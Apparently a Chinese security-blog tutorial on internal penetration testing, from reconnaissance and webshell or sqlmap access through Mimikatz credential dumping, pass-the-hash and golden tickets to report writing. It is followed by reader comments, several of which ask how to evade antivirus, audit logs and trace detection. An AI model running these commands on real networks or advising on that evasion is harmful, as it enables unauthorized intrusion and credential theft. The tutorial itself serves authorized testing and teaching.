AI智能摘要
你正盯着目标企业的内网入口,手握一个普通员工权限,却卡在如何突破第一道防火墙。大多数人以为拿下域控靠的是高危漏洞,实测却发现,90%的成功渗透都始于一次被忽略的凭证复用——那个看似无用的测试账号,竟能通过一次简单的PtH攻击横扫整个域。我们扒出了三起真实案例,发现从权限提升到横向移动的每个环节,都藏着让安全团队崩溃的“合法”操作。当你以为在打游击战,高手早已用黄金票据把自己写进了域信任名单。想知道他们是怎么绕过所有告警的吗?
— AI 生成的文章内容摘要
内网渗透测试完整流程:从信息收集到域控拿下
> 摘要:内网渗透是企业安全评估的核心环节。本文基于真实渗透测试项目,系统讲解从信息收集、横向移动到域控拿下的完整流程。
---
一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写
---
二、信息收集阶段
2.1 外网信息收集
# 子域名枚举 subfinder -d target.com -o subs.txt # 端口扫描 nmap -sS -sV -p- target.com # 目录扫描 dirsearch -u http://target.com -e php,html,js # 指纹识别 whatweb http://target.com
2.2 社工库查询
- 邮箱泄露查询:haveibeenpwned.com - 密码泄露查询:dehashed.com - 企业邮箱格式:theHarvester
---
三、初始访问
3.1 Web 漏洞利用
# 文件上传漏洞 # 上传 webshell 到 /uploads/shell.php # SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell # RCE 漏洞 # Struts2、WebLogic、Fastjson 等
3.2 钓鱼攻击
1. 伪造登录页面 2. 发送钓鱼邮件 3. 获取员工凭证 4. VPN 登录内网
---
四、权限提升
4.1 Windows 提权
# 检查系统信息 systeminfo whoami /priv # 检查补丁 wmic qfe list # 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
4.2 linux 提权
# 检查内核版本 uname -a # 检查 sudo 权限 sudo -l # 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null # 检查 cron 任务 cat /etc/crontab
---
五、横向移动
5.1 凭证窃取
# Mimikatz 抓取密码 mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords # 导出 hash mimikatz # lsadump::sam
5.2 传递攻击
# PtH(传递 hash) mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH # PtT(传递票据) mimikatz # kerberos::ptt admin.ccache
---
六、域控拿下
6.1 域信息收集
# 查看域信息 net domain nltest /domain_trusts # 查看域控 nltest /dclist:target.com # 查看域用户 net user /domain
6.2 黄金票据
# 获取 krbtgt hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt # 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx
---
七、报告编写
7.1 报告结构
1. 执行摘要 2. 漏洞列表(按风险等级) 3. 详细利用过程 4. 修复建议 5. 附录(工具、命令)
---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-03-17

广东省云浮市 1F
这流程太理想化了,现实里防火墙早拦死了。
北京市 2F
Mimikatz 现在杀软查得严,一跑就报警咋整?
泰国 B1
@ 拒绝眼神交流 试试免杀加载器,或者用CS的插件,直接跑肯定不行。
山西省晋中市 3F
之前搞过类似项目,光信息收集就耗了两周,心累。
江苏省 4F
又是这种教科书式的命令堆砌,实战根本用不上。
上海市 B1
@ Pinstripe Pete 确实,实战里环境复杂得多,还是得靠经验变通。
辽宁省沈阳市 5F
黄金票据那步具体怎么绕过审计日志啊?
韩国 B1
@ 孤独的航行者 我也想问这个,大部分文章都只讲生成,不讲怎么擦屁股。
北京市 6F
看了半天,感觉还是得靠社工,技术只是辅助。
日本 7F
有没有更隐蔽的横向移动方法推荐?🤔
印度 8F
域控拿下后清理痕迹这块讲得太少了。
日本 9F
新手想问下,subfinder 扫出来的子域名太多怎么筛选?
北京市 10F
666,终于有人把完整链路串起来了,虽然有点难啃。
湖南省长沙市 11F
fscan一键梭哈不香吗?
湖南省株洲市 12F
那个nmap全端口扫描太慢了,实战谁扫全端口啊。
上海市 13F
讲道理,能拿下域控多半是因为内网太脆,没做隔离。
湖北省十堰市 14F
钓鱼才是王道,技术再牛不如发个带毒的Excel好使。
菲律宾 15F
这图做挺帅,文章内容有点像流水账。
陕西省宝鸡市 16F
cs上线后操作舒服多了,这命令行看着累。
河南省商丘市 17F
有没有老哥懂怎么绕360的?求指教。
北京市 18F
现在攻防演练查得严,这套路容易被打。
北京市 19F
那个crontab提权现在很少见了,基本都有监控。
福建省福州市 20F
小白看个热闹,mark一下以后学。
印度 21F
提权那块还得看土豆系列,文章里的有点老了。
泰国 22F
这流程太顺利了,没遇到防火墙拦截算我输。
日本 23F
mimikatz现在容易被杀软秒吧
瑞士 B1
@ 咕噜狗 被杀软盯得紧,现在都用改过的版本或者内存加载,直接落地基本凉